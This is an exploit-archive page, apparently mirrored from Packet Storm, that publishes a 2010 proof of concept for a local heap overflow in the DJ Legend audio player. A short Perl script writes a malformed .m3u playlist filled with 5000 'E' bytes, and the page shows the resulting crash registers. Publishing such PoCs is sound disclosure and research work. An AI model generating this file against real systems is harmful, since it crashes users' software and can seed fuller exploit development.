Lucene search
K

DJ Legend Heap Overflow Proof Of Concept

🗓️ 24 Jan 2010 00:00:00Reported by SkuLL-HacKeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

DJ Legend Heap Overflow Poc # DJ Legend [.m3u / .pls File ] Local Heap Overflow Proof Of Concept

Code
`  
  
#!/usr/bin/perl  
# DJ Legend [.m3u / .pls File ] Local Heap Overflow Poc  
# www.djlegend.net/<http://www.djlegend.net/>  
# Found By : SkuLL-HacKeR  
# Msn : [email protected]<mailto:[email protected]>  
########################################################################################  
#EAX 45454545  
#ESP 0012EF6C  
#EBP 00DA50F8 ASCII "C:\Program Files\DJ Legend Trial\SkuLL-HacKeR.m3u"  
#ESI 0012EFD8  
#EDI 014143F8  
#EBP 00000000  
#ESI 02CD7102  
#EIP 7C90EAF0 ntdll.KiFastSystemCallRet  
use strict;  
use warnings;  
my $A= "\x45" x 5000;  
open(my $ofl_playlist, "> SkuLL-HacKeR.M3u");  
print $ofl_playlist  
$A.  
"\r\n";  
close $ofl_playlist;  
  
________________________________  
Windows Live Messenger Windows Live Messenger, l'unico e l'originale. Diffida dalle imitazioni!<http://www.messenger.it>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation